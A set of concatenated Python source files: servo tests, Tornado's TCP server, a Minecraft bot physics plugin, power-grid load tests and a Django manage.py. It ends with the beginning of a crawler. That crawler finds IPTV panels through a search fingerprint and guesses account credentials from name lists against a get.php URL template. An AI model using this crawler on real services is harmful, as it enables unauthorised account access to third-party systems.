class TestPosition(test_bot.TestBot):
    """Test setting and checking the position of a servo."""

    def setUp(self):
        """Build a simulated PWM device and a servo object on top of it."""
        super(TestPosition, self).setUp()
        config_file = path.dirname(path.realpath(__file__)) + "/test_config.yaml"
        self.config = lib.get_config(config_file)
        self.pwm_num = self.config['test_servo']
        self.setup_pwm(self.pwm_num, "1\n", "150\n", "200\n", "0\n")
        self.servo = s_mod.Servo(self.pwm_num)

    def tearDown(self):
        """Restore testing flag state in config file."""
        super(TestPosition, self).tearDown()

    def test_0(self):
        """Servo accepts the extreme position in the zero direction."""
        self.servo.position = 0
        assert self.servo.position == 0, self.servo.position

    def test_180(self):
        """Servo accepts the extreme position in the 180 direction."""
        self.servo.position = 180
        assert self.servo.position == 180, self.servo.position

    def test_middle(self):
        """Servo can be set to the center position."""
        self.servo.position = 90
        assert self.servo.position == 90, self.servo.position

    def test_series(self):
        """Sweep through a series of positions, reading each one back."""
        for angle in range(0, 180, 18):
            self.servo.position = angle
            assert self.servo.position == angle, self.servo.position

    def test_manually_confirm(self):
        """Set random positions and verify them via the simulated hardware."""
        for _ in range(10):
            target = randint(0, 180)
            self.servo.position = target
            pwm_state = self.get_pwm(self.pwm_num)
            duty_ns = int(pwm_state["duty_ns"])
            # Invert the duty-cycle mapping the servo driver applies.
            observed = int(round(((duty_ns - 580000) / 2320000.) * 180))
            assert observed == target, "{} != {}".format(observed, target)

    def test_over_max(self):
        """Positions above 180 are clamped to the maximum."""
        self.servo.position = 181
        assert self.servo.position == 180, \
            "Actual: {}".format(self.servo.position)

    def test_under_min(self):
        """Positions below 0 are clamped to the minimum."""
        self.servo.position = -1
        assert self.servo.position == 0, \
            "Actual: {}".format(self.servo.position)
|
data/RobotWebTools/rosbridge_suite/rosbridge_server/src/tornado/tcpserver.py
|
"""A non-blocking, single-threaded TCP server."""
from __future__ import absolute_import, division, print_function, with_statement
import errno
import os
import socket
from tornado.log import app_log
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream, SSLIOStream
from tornado.netutil import bind_sockets, add_accept_handler, ssl_wrap_socket
from tornado import process
from tornado.util import errno_from_exception
try:
import ssl
except ImportError:
ssl = None
class TCPServer(object):
    r"""A non-blocking, single-threaded TCP server.

    To use `TCPServer`, define a subclass which overrides the `handle_stream`
    method.

    To make this server serve SSL traffic, send the ssl_options dictionary
    argument with the arguments required for the `ssl.wrap_socket` method,
    including "certfile" and "keyfile"::

       TCPServer(ssl_options={
           "certfile": os.path.join(data_dir, "mydomain.crt"),
           "keyfile": os.path.join(data_dir, "mydomain.key"),
       })

    `TCPServer` initialization follows one of three patterns:

    1. `listen`: simple single-process::

            server = TCPServer()
            server.listen(8888)
            IOLoop.instance().start()

    2. `bind`/`start`: simple multi-process::

            server = TCPServer()
            server.bind(8888)
            server.start(0)
            IOLoop.instance().start()

       When using this interface, an `.IOLoop` must *not* be passed
       to the `TCPServer` constructor.  `start` will always start
       the server on the default singleton `.IOLoop`.

    3. `add_sockets`: advanced multi-process::

            sockets = bind_sockets(8888)
            tornado.process.fork_processes(0)
            server = TCPServer()
            server.add_sockets(sockets)
            IOLoop.instance().start()

       The `add_sockets` interface is more complicated, but it can be
       used with `tornado.process.fork_processes` to give you more
       flexibility in when the fork happens.  `add_sockets` can
       also be used in single-process servers if you want to create
       your listening sockets in some way other than
       `~tornado.netutil.bind_sockets`.

    .. versionadded:: 3.1
       The ``max_buffer_size`` argument.
    """
    def __init__(self, io_loop=None, ssl_options=None, max_buffer_size=None,
                 read_chunk_size=None):
        self.io_loop = io_loop
        self.ssl_options = ssl_options
        self._sockets = {}  # fd -> socket object
        self._pending_sockets = []
        self._started = False
        self.max_buffer_size = max_buffer_size
        # BUGFIX: this was hard-coded to None, silently discarding the
        # read_chunk_size constructor argument; streams then always fell
        # back to the IOStream default chunk size.
        self.read_chunk_size = read_chunk_size

        # Verify the SSL options eagerly so misconfiguration fails at
        # construction time rather than on the first client connection.
        if self.ssl_options is not None and isinstance(self.ssl_options, dict):
            if 'certfile' not in self.ssl_options:
                raise KeyError('missing key "certfile" in ssl_options')

            if not os.path.exists(self.ssl_options['certfile']):
                raise ValueError('certfile "%s" does not exist' %
                                 self.ssl_options['certfile'])
            if ('keyfile' in self.ssl_options and
                    not os.path.exists(self.ssl_options['keyfile'])):
                raise ValueError('keyfile "%s" does not exist' %
                                 self.ssl_options['keyfile'])

    def listen(self, port, address=""):
        """Starts accepting connections on the given port.

        This method may be called more than once to listen on multiple ports.
        `listen` takes effect immediately; it is not necessary to call
        `TCPServer.start` afterwards.  It is, however, necessary to start
        the `.IOLoop`.
        """
        sockets = bind_sockets(port, address=address)
        self.add_sockets(sockets)

    def add_sockets(self, sockets):
        """Makes this server start accepting connections on the given sockets.

        The ``sockets`` parameter is a list of socket objects such as
        those returned by `~tornado.netutil.bind_sockets`.
        `add_sockets` is typically used in combination with that
        method and `tornado.process.fork_processes` to provide greater
        control over the initialization of a multi-process server.
        """
        if self.io_loop is None:
            self.io_loop = IOLoop.current()

        for sock in sockets:
            self._sockets[sock.fileno()] = sock
            add_accept_handler(sock, self._handle_connection,
                               io_loop=self.io_loop)

    def add_socket(self, socket):
        """Singular version of `add_sockets`.  Takes a single socket object."""
        self.add_sockets([socket])

    def bind(self, port, address=None, family=socket.AF_UNSPEC, backlog=128):
        """Binds this server to the given port on the given address.

        To start the server, call `start`. If you want to run this server
        in a single process, you can call `listen` as a shortcut to the
        sequence of `bind` and `start` calls.

        Address may be either an IP address or hostname.  If it's a hostname,
        the server will listen on all IP addresses associated with the
        name.  Address may be an empty string or None to listen on all
        available interfaces.  Family may be set to either `socket.AF_INET`
        or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
        both will be used if available.

        The ``backlog`` argument has the same meaning as for
        `socket.listen <socket.socket.listen>`.

        This method may be called multiple times prior to `start` to listen
        on multiple ports or interfaces.
        """
        sockets = bind_sockets(port, address=address, family=family,
                               backlog=backlog)
        if self._started:
            self.add_sockets(sockets)
        else:
            # Defer accept-handler registration until start() runs, so that
            # process forking (if any) happens before the IOLoop is touched.
            self._pending_sockets.extend(sockets)

    def start(self, num_processes=1):
        """Starts this server in the `.IOLoop`.

        By default, we run the server in this process and do not fork any
        additional child process.

        If num_processes is ``None`` or <= 0, we detect the number of cores
        available on this machine and fork that number of child
        processes. If num_processes is given and > 1, we fork that
        specific number of sub-processes.

        Since we use processes and not threads, there is no shared memory
        between any server code.

        Note that multiple processes are not compatible with the autoreload
        module (or the ``autoreload=True`` option to `tornado.web.Application`
        which defaults to True when ``debug=True``).
        When using multiple processes, no IOLoops can be created or
        referenced until after the call to ``TCPServer.start(n)``.
        """
        assert not self._started
        self._started = True
        if num_processes != 1:
            process.fork_processes(num_processes)
        sockets = self._pending_sockets
        self._pending_sockets = []
        self.add_sockets(sockets)

    def stop(self):
        """Stops listening for new connections.

        Requests currently in progress may still continue after the
        server is stopped.
        """
        for fd, sock in self._sockets.items():
            self.io_loop.remove_handler(fd)
            sock.close()

    def handle_stream(self, stream, address):
        """Override to handle a new `.IOStream` from an incoming connection."""
        raise NotImplementedError()

    def _handle_connection(self, connection, address):
        if self.ssl_options is not None:
            assert ssl, "Python 2.6+ and OpenSSL required for SSL"
            try:
                connection = ssl_wrap_socket(connection,
                                             self.ssl_options,
                                             server_side=True,
                                             do_handshake_on_connect=False)
            except ssl.SSLError as err:
                # Clients that disconnect mid-handshake are not an error.
                if err.args[0] == ssl.SSL_ERROR_EOF:
                    return connection.close()
                else:
                    raise
            except socket.error as err:
                # ECONNABORTED/EINVAL mean the client went away before the
                # handshake could begin; nothing to do but close.
                if errno_from_exception(err) in (errno.ECONNABORTED, errno.EINVAL):
                    return connection.close()
                else:
                    raise
        try:
            if self.ssl_options is not None:
                stream = SSLIOStream(connection, io_loop=self.io_loop,
                                     max_buffer_size=self.max_buffer_size,
                                     read_chunk_size=self.read_chunk_size)
            else:
                stream = IOStream(connection, io_loop=self.io_loop,
                                  max_buffer_size=self.max_buffer_size,
                                  read_chunk_size=self.read_chunk_size)
            self.handle_stream(stream, address)
        except Exception:
            # handle_stream is user code; never let its errors kill the
            # accept loop.
            app_log.error("Error in connection callback", exc_info=True)
|
data/SpockBotMC/SpockBot/spockbot/plugins/helpers/physics.py
|
"""
A Physics module built from clean-rooming the Notchian Minecraft client
Collision detection and resolution is done by a Separating Axis Theorem
implementation for concave shapes decomposed into Axis-Aligned Bounding Boxes.
This isn't totally equivalent to vanilla behavior, but it's faster and
Close Enough^TM
AKA this file does Minecraft physics
"""
import collections
import logging
import math
from spockbot.mcdata import blocks, constants as const
from spockbot.mcdata.utils import BoundingBox
from spockbot.plugins.base import PluginBase, pl_announce
from spockbot.plugins.tools import collision
from spockbot.vector import Vector3
logger = logging.getLogger('spockbot')
FP_MAGIC = 1e-4
class PhysicsCore(object):
    """Movement API handed to other plugins via the 'Physics' provider.

    Operates on the position/velocity objects shared with PhysicsPlugin;
    all methods mutate that shared state in place.
    """
    def __init__(self, pos, vec, abilities):
        # pos and vec are shared, mutable state also used by PhysicsPlugin.
        self.pos = pos
        self.vec = vec
        self.sprinting = False
        # Current horizontal acceleration; switched by walk()/sprint().
        self.move_accel = abilities.walking_speed
        self.abilities = abilities
        # Steering vector consumed once per physics tick by PhysicsPlugin.
        self.direction = Vector3()
    def jump(self):
        # Jumping requires ground contact.
        if self.pos.on_ground:
            if self.sprinting:
                ground_speed = Vector3(self.vec.x, 0, self.vec.z)
                if ground_speed:
                    # Sprint jumps add a horizontal boost along the current
                    # direction of travel.
                    self.vec += ground_speed.norm() * const.PHY_JMP_MUL
            self.vec.y = const.PHY_JMP_ABS
    def walk(self):
        # Drop back to normal walking acceleration.
        self.sprinting = False
        self.move_accel = self.abilities.walking_speed
    def sprint(self):
        # Raise acceleration by the sprint multiplier.
        self.sprinting = True
        self.move_accel = self.abilities.walking_speed * const.PHY_SPR_MUL
    def move_target(self, vector):
        # Steer toward an absolute position (horizontal component only).
        self.direction = vector - self.pos
        self.direction.y = 0
        # NOTE(review): relies on Vector3's '<=' operator to compare the
        # remaining offset with the current horizontal velocity -- presumably
        # this means "we will reach the target this tick"; confirm the
        # comparison semantics in spockbot.vector.
        if self.direction <= Vector3(self.vec.x, 0, self.vec.z):
            return True
    def move_vector(self, vector):
        # Steer along the given vector; the vertical component is discarded
        # (note: the caller's vector is mutated).
        vector.y = 0
        self.direction = vector
    def move_angle(self, angle, radians=False):
        # Steer along a heading angle, given in degrees unless radians=True.
        angle = angle if radians else math.radians(angle)
        self.direction = Vector3(math.sin(angle), 0, math.cos(angle))
@pl_announce('Physics')
class PhysicsPlugin(PluginBase):
    """Runs the client-side physics simulation.

    Each physics tick: apply steering acceleration, resolve collisions with
    the world via a minimum-translation vector (MTV), move, then apply
    gravity and drag.
    """
    requires = ('Event', 'ClientInfo', 'Net', 'World')
    events = {
        'physics_tick': 'physics_tick',
        'client_tick': 'client_tick',
        'client_position_update': 'skip_physics',
        'client_mount': 'suspend_physics',
        'client_unmount': 'resume_physics',
    }
    def __init__(self, ploader, settings):
        super(PhysicsPlugin, self).__init__(ploader, settings)
        # Current velocity; shared (mutated in place) with PhysicsCore.
        self.vec = Vector3(0.0, 0.0, 0.0)
        # Collision tester sized to the player's bounding box.
        self.col = collision.MTVTest(
            self.world, BoundingBox(const.PLAYER_WIDTH, const.PLAYER_HEIGHT)
        )
        self.pos = self.clientinfo.position
        # Set when the server overrides our position, so the next tick is
        # not integrated on stale state.
        self.skip_tick = False
        self.pc = PhysicsCore(self.pos, self.vec, self.clientinfo.abilities)
        ploader.provides('Physics', self.pc)
    def skip_physics(self, _=None, __=None):
        # Server-authoritative position change: drop velocity, skip a tick.
        self.vec.zero()
        self.skip_tick = True
    def suspend_physics(self, _=None, __=None):
        # While mounted, the vehicle moves us; stop simulating.
        self.vec.zero()
        self.event.unreg_event_handler('physics_tick', self.physics_tick)
    def resume_physics(self, _=None, __=None):
        self.event.reg_event_handler('physics_tick', self.physics_tick)
    def client_tick(self, name, data):
        # Report our position to the server once per client tick.
        self.net.push_packet('PLAY>Player Position and Look',
                             self.clientinfo.position.get_dict())
    def physics_tick(self, _, __):
        # Integration order: accelerate, collide, move, gravity, drag.
        if self.skip_tick:
            self.skip_tick = False
            return
        self.apply_accel()
        mtv = self.get_mtv()
        self.apply_vector(mtv)
        # An upward correction means something pushed us up: we stand on it.
        self.pos.on_ground = mtv.y > 0
        self.vec -= Vector3(0, const.PHY_GAV_ACC, 0)
        self.apply_drag()
        # Steering input was consumed; reset for the next tick.
        self.pc.direction = Vector3()
    def get_block_slip(self):
        # Slipperiness of the block under our feet; 1 while airborne.
        if self.pos.on_ground:
            bpos = self.pos.floor()
            return blocks.get_block(*self.world.get_block(*bpos)).slipperiness
        return 1
    def apply_accel(self):
        # No steering input -> no acceleration this tick.
        if not self.pc.direction:
            return
        if self.pos.on_ground:
            # Slippery blocks (e.g. low friction) reduce ground acceleration.
            block_slip = self.get_block_slip()
            accel_mod = const.BASE_GND_SLIP**3 / block_slip**3
            accel = self.pc.move_accel * accel_mod * const.PHY_BASE_DRG
        else:
            accel = const.PHY_JMP_ACC
        self.vec += self.pc.direction.norm() * accel
    def apply_vector(self, mtv):
        # Move, then zero any velocity component a collision blocked.
        self.pos += (self.vec + mtv)
        self.vec.x = 0 if mtv.x else self.vec.x
        self.vec.y = 0 if mtv.y else self.vec.y
        self.vec.z = 0 if mtv.z else self.vec.z
    def apply_drag(self):
        # Horizontal drag depends on the ground block; vertical drag is fixed.
        drag = self.get_block_slip() * const.PHY_DRG_MUL
        self.vec.x *= drag
        self.vec.z *= drag
        self.vec.y *= const.PHY_BASE_DRG
    def get_mtv(self):
        """BFS over candidate corrections to find a minimum translation
        vector that resolves all collisions at the position we are about
        to move to. Returns a zero vector if no resolution is found."""
        pos = self.pos + self.vec
        pos = collision.uncenter_position(pos, self.col.bbox)
        q = collections.deque((Vector3(),))
        while q:
            current_vector = q.popleft()
            transform_vectors = self.col.check_collision(pos, current_vector)
            # A falsy (presumably zero) transform means no remaining
            # collision on that axis: a candidate resolution is found.
            if not all(transform_vectors):
                break
            for vector in transform_vectors:
                test_vec = self.vec + current_vector + vector
                # Only pursue corrections that don't increase our speed;
                # FP_MAGIC absorbs floating-point noise.
                if test_vec.dist_sq() <= self.vec.dist_sq() + FP_MAGIC:
                    q.append(current_vector + vector)
        else:
            # while/else: queue exhausted without hitting `break`.
            logger.debug('Physics failed to generate an MTV, bailing out')
            self.vec.zero()
            return Vector3()
        # Gather all remaining queued candidates that also resolve, then
        # pick the minimal one.
        possible_mtv = [current_vector]
        while q:
            current_vector = q.popleft()
            transform_vectors = self.col.check_collision(pos, current_vector)
            if not all(transform_vectors):
                possible_mtv.append(current_vector)
        return min(possible_mtv)
|
data/WattTime/pyiso/tests/test_load.py
|
from pyiso import client_factory, BALANCING_AUTHORITIES
from pyiso.base import BaseClient
from pyiso.eu import EUClient
from unittest import TestCase
import pytz
from datetime import datetime, timedelta
class TestBaseLoad(TestCase):
    """Shared fixture and datapoint assertions for per-BA load tests."""
    def setUp(self):
        base = BaseClient()
        self.MARKET_CHOICES = base.MARKET_CHOICES
        self.FREQUENCY_CHOICES = base.FREQUENCY_CHOICES
        self.BA_CHOICES = BALANCING_AUTHORITIES.keys()
    def _run_test(self, ba_name, expect_data=True, **kwargs):
        """Fetch load data for a BA and sanity-check every datapoint."""
        client = client_factory(ba_name)
        data = client.get_load(**kwargs)
        if not expect_data:
            self.assertEqual(data, [])
        else:
            self.assertGreaterEqual(len(data), 1)
        expected_keys = set(['load_MW', 'ba_name',
                             'timestamp', 'freq', 'market'])
        for point in data:
            self.assertEqual(expected_keys, set(point.keys()))
            self.assertEqual(point['timestamp'].tzinfo, pytz.utc)
            self.assertIn(point['ba_name'], self.BA_CHOICES)
            # Numeric sanity check: a NaN load would fail this comparison.
            self.assertGreaterEqual(point['load_MW']+1, point['load_MW'])
            # Forecast clients must return future timestamps, others past.
            if client.options['forecast']:
                self.assertGreaterEqual(point['timestamp'], pytz.utc.localize(datetime.utcnow()))
            else:
                self.assertLess(point['timestamp'], pytz.utc.localize(datetime.utcnow()))
        return data
    def _run_notimplemented_test(self, ba_name, **kwargs):
        """Assert that get_load is unsupported for this BA."""
        client = client_factory(ba_name)
        self.assertRaises(NotImplementedError, client.get_load)
class TestBPALoad(TestBaseLoad):
    """Load tests for BPA."""
    def test_latest(self):
        """Latest 5-min load: one timestamp; 5-min market/freq everywhere."""
        data = self._run_test('BPA', latest=True, market=self.MARKET_CHOICES.fivemin)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
    def test_date_range(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('BPA', start_at=today-timedelta(days=2),
                              end_at=today-timedelta(days=1))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
    def test_date_range_farpast(self):
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('BPA', start_at=today-timedelta(days=20),
                              end_at=today-timedelta(days=10))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
class TestCAISOLoad(TestBaseLoad):
    """Load tests for CAISO."""
    def test_latest(self):
        """Latest 5-min load: one timestamp; 5-min market/freq everywhere."""
        data = self._run_test('CAISO', latest=True, market=self.MARKET_CHOICES.fivemin)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
    def test_date_range(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('CAISO', start_at=today-timedelta(days=2),
                              end_at=today-timedelta(days=1))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
    def test_forecast(self):
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('CAISO', start_at=today + timedelta(hours=20),
                              end_at=today+timedelta(days=2))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
class TestERCOTLoad(TestBaseLoad):
    """Load tests for ERCOT."""
    def test_latest(self):
        """Latest 5-min load: one timestamp; 5-min market/freq everywhere."""
        data = self._run_test('ERCOT', latest=True, market=self.MARKET_CHOICES.fivemin)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
    def test_forecast(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('ERCOT', start_at=today + timedelta(hours=20),
                              end_at=today+timedelta(days=2))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
        self.assertGreaterEqual(min(timestamps), today+timedelta(hours=20))
        self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestISONELoad(TestBaseLoad):
    """Load tests for ISONE."""
    def test_latest(self):
        data = self._run_test('ISONE', latest=True)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
    def test_date_range(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('ISONE', start_at=today-timedelta(days=2),
                              end_at=today-timedelta(days=1))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
    def test_forecast(self):
        data = self._run_test('ISONE', forecast=True, market='DAHR', freq='1hr')
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
class TestMISOLoad(TestBaseLoad):
    """Load tests for MISO (forecast only)."""
    def test_forecast(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('MISO', start_at=today + timedelta(hours=10),
                              end_at=today+timedelta(days=2))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
        self.assertGreaterEqual(min(timestamps), today+timedelta(hours=10))
        self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestNEVPLoad(TestBaseLoad):
    """Load tests for NEVP."""
    def test_latest(self):
        data = self._run_test('NEVP', latest=True)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.hourly)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.hourly)
    def test_date_range(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('NEVP', start_at=today-timedelta(days=1),
                              end_at=today)
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
    def test_date_range_farpast(self):
        today = pytz.utc.localize(datetime.utcnow())
        # Per-datapoint validation happens inside _run_test.
        self._run_test('NEVP', start_at=today-timedelta(days=35),
                       end_at=today-timedelta(days=33))
class TestNYISOLoad(TestBaseLoad):
    """Load tests for NYISO."""
    def test_latest(self):
        data = self._run_test('NYISO', latest=True, market=self.MARKET_CHOICES.fivemin)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
    def test_date_range(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('NYISO', start_at=today-timedelta(days=2),
                              end_at=today-timedelta(days=1))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
    def test_forecast(self):
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('NYISO', start_at=today + timedelta(hours=20),
                              end_at=today+timedelta(days=2))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
        self.assertGreaterEqual(min(timestamps), today+timedelta(hours=20))
        self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestPJMLoad(TestBaseLoad):
    """Load tests for PJM."""
    def test_latest(self):
        data = self._run_test('PJM', latest=True, market=self.MARKET_CHOICES.fivemin)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
    def test_forecast(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('PJM', start_at=today + timedelta(hours=20),
                              end_at=today+timedelta(days=2))
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
        self.assertGreaterEqual(min(timestamps), today+timedelta(hours=20))
        self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestSPPLoad(TestBaseLoad):
    """SPP has no load support; get_load must raise NotImplementedError."""
    def test_failing(self):
        self._run_notimplemented_test('SPP')
class TestSPPCLoad(TestBaseLoad):
    """Load tests for SPPC."""
    def test_latest(self):
        data = self._run_test('SPPC', latest=True)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.hourly)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.hourly)
    def test_date_range(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('SPPC', start_at=today-timedelta(days=1),
                              end_at=today)
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
    def test_date_range_farpast(self):
        today = pytz.utc.localize(datetime.utcnow())
        # Per-datapoint validation happens inside _run_test.
        self._run_test('SPPC', start_at=today-timedelta(days=35),
                       end_at=today-timedelta(days=33))
class TestSVERILoad(TestBaseLoad):
    """Load tests for every BA backed by the sveri module."""
    def setUp(self):
        super(TestSVERILoad, self).setUp()
        self.bas = [k for k, v in BALANCING_AUTHORITIES.items() if v['module'] == 'sveri']
    def test_latest_all(self):
        for ba in self.bas:
            self._test_latest(ba)
    def test_date_range_all(self):
        for ba in self.bas:
            self._test_date_range(ba)
    def _test_latest(self, ba):
        data = self._run_test(ba, latest=True)
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
    def _test_date_range(self, ba):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test(ba, start_at=today - timedelta(days=3),
                              end_at=today - timedelta(days=2), market=self.MARKET_CHOICES.fivemin)
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
class TestEULoad(TestBaseLoad):
    """Load tests for the EU client (per control area)."""
    def setUp(self):
        super(TestEULoad, self).setUp()
        # EU datapoints carry control-area names, not BA names.
        self.BA_CHOICES = EUClient.CONTROL_AREAS.keys()
    def test_latest(self):
        data = self._run_test('EU', latest=True, market=self.MARKET_CHOICES.hourly,
                              control_area='IT')
        timestamps = [d['timestamp'] for d in data]
        self.assertEqual(len(set(timestamps)), 1)
        for dp in data:
            self.assertEqual(dp['market'], self.MARKET_CHOICES.hourly)
            self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.hourly)
    def test_date_range(self):
        # Use true UTC "now": datetime.today() is naive *local* time, so
        # stamping it with tzinfo=utc shifted the window by the UTC offset.
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('EU', start_at=today-timedelta(days=2),
                              end_at=today-timedelta(days=1),
                              control_area='IT')
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
    def test_forecast(self):
        today = pytz.utc.localize(datetime.utcnow())
        data = self._run_test('EU', start_at=today+timedelta(hours=20),
                              end_at=today+timedelta(days=1),
                              control_area='IT')
        timestamps = [d['timestamp'] for d in data]
        self.assertGreater(len(set(timestamps)), 1)
|
data/Miserlou/django-zappa/manage.py
|
import os
import sys
if __name__ == "__main__":
    # Default to the test settings module unless the caller overrides it.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_settings")
    from django.core.management import execute_from_command_line
    # When running the test suite, measure coverage of the django_zappa
    # package (excluding the test modules themselves).
    is_testing = 'test' in sys.argv
    if is_testing:
        import coverage
        cov = coverage.coverage(include="django_zappa/*", omit=['*tests.py'])
        cov.erase()
        cov.start()
    execute_from_command_line(sys.argv)
    if is_testing:
        # Stop measuring and print the coverage report to stdout.
        cov.stop()
        cov.save()
        cov.report()
|
data/Pirate-Crew/IPTV/iptv/Crawler.py
|
import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse
"""Crawler
Class that handles the crawling process that fetch accounts on illegal IPTVs
Authors:
Claudio Ludovico (@Ludo237)
Pinperepette (@Pinperepette)
Arm4x (@Arm4x)
"""
class Crawler(object):
    """Handles the crawling process that fetches accounts on IPTV panels.

    Authors:
        Claudio Ludovico (@Ludo237)
        Pinperepette (@Pinperepette)
        Arm4x (@Arm4x)
    """
    version = "1.2.3"
    outputDir = "output"
    languageDir = "languages"
    # URL template probed for each candidate username/password pair.
    basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
    # Search-engine fingerprint identifying target panels.
    searchString = "Xtream Codes v1.0.59.5"
    def __init__(self, language = "it"):
        """Default constructor

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
        names file we need to use. (default it)
        """
        self.language = language.lower()
        self.parsedUrls = []
        self.foundedAccounts = 0
    def change_language(self, language = "it"):
        """Set the language you want to use to brute force names

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
        names file we need to use. (default it)

        Return:
        boolean -- true if the language file exists, otherwise false
        """
        if os.path.isfile(self.languageDir + "/" + language + ".txt"):
            self.language = language
            return True
        else:
            return False
    def search_links(self):
        """Print the first 30 links from a Web search

        We set the limit of 30 links because this script serve as demonstration and it's
        not intended to be use for personal purpose.
        """
        for url in google.search(self.searchString, num=30, stop=1):
            parsed = urlparse(url)
            self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)
    def search_accounts(self, url = None):
        """Search Accounts

        This is the core method. It will crawl the give url for any possible accounts
        If we found any we will create a new directory under /output with the name
